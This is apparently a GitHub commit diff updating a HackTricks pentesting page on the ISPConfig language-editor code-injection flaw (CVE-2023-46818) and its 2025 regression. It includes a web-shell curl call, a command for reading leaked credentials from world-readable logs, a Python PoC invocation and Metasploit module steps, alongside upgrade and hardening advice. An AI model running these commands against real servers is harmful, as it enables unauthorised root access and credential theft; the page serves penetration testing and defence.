Skip to content

Commit 506b9fd

Browse files
carlospolopcarlospolop
authored
Merge pull request #1867 from HackTricks-wiki/research_update_src_network-services-pentesting_pentesting-web_ispconfig_20260206_131312
Research Update Enhanced src/network-services-pentesting/pen...
2 parents 923bafd + e1c9abf commit 506b9fd

1 file changed

Lines changed: 31 additions & 1 deletion

File tree

src/network-services-pentesting/pentesting-web/ispconfig.md

Lines changed: 31 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -74,6 +74,18 @@ curl 'http://127.0.0.1:9001/admin/shell.php?cmd=id'
7474

7575
If PHP is executed as root (e.g., via `php -S 127.0.0.1:8080` started by root), this yields immediate root RCE. Otherwise, you gain code execution as the web server user.
7676

77+
### 2025 regression (ISPConfig 3.3.0 / 3.3.0p1)
78+
79+
The language editor bug resurfaced in 3.3.0/3.3.0p1 and was fixed in **3.3.0p2**. Preconditions are unchanged (`admin_allow_langedit` and admin login). The same patch also addressed a monitor XSS and world-readable rotated logs.
80+
81+
**Notes:**
82+
- On 3.3.0/3.3.0p1, world-readable rotated logs under `/usr/local/ispconfig/interface/log/` may leak credentials if debug logging was enabled:
83+
84+
```bash
85+
find /usr/local/ispconfig/interface/log -type f -perm -004 -name '*.gz' -exec zcat {} + | head
86+
```
87+
- Exploit steps match CVE-2023-46818; 3.3.0p2 adds extra checks before language editing.
88+
7789
### Python PoC
7890

7991
A ready-to-use exploit automates token handling and payload delivery:
@@ -85,9 +97,25 @@ Example run:
8597
python3 cve-2023-46818.py http://127.0.0.1:9001 admin <password>
8698
```
8799

100+
### Metasploit module (released July 2025)
101+
102+
Rapid7 added `exploit/linux/http/ispconfig_lang_edit_php_code_injection`, which can auto-enable `admin_allow_langedit` if the supplied admin account has system-config rights.
103+
104+
```text
105+
use exploit/linux/http/ispconfig_lang_edit_php_code_injection
106+
set RHOSTS 10.10.10.50
107+
set RPORT 8080
108+
set USERNAME admin
109+
set PASSWORD <admin_pass>
110+
set TARGETURI /
111+
run
112+
```
113+
114+
The module writes a base64-encoded payload through `records[]` and executes it, giving a PHP Meterpreter or custom payload.
115+
88116
### Hardening
89117

90-
- Upgrade to 3.2.11p1 or later
118+
- Upgrade to **3.2.11p1** or later for the original issue, and to **3.3.0p2** or later for the 2025 regression.
91119
- Disable the language editor unless strictly needed:
92120

93121
```
@@ -103,5 +131,7 @@ admin_allow_langedit=no
103131
- [CVE-2023-46818 – NVD](https://nvd.nist.gov/vuln/detail/CVE-2023-46818)
104132
- [bipbopbup/CVE-2023-46818-python-exploit](https://github.com/bipbopbup/CVE-2023-46818-python-exploit)
105133
- [HTB Nocturnal: Root via ISPConfig language editor RCE](https://0xdf.gitlab.io/2025/08/16/htb-nocturnal.html)
134+
- [ISPConfig 3.3.0p2 Released – Security Update](https://www.ispconfig.org/blog/ispconfig-3-3-0p2-released-security-update/)
135+
- [CXSecurity WLB-2025070017 – Metasploit module for ISPConfig language_edit.php](https://cxsecurity.com/issue/WLB-2025070017)
106136

107137
{{#include ../../banners/hacktricks-training.md}}

0 commit comments

Comments
 (0)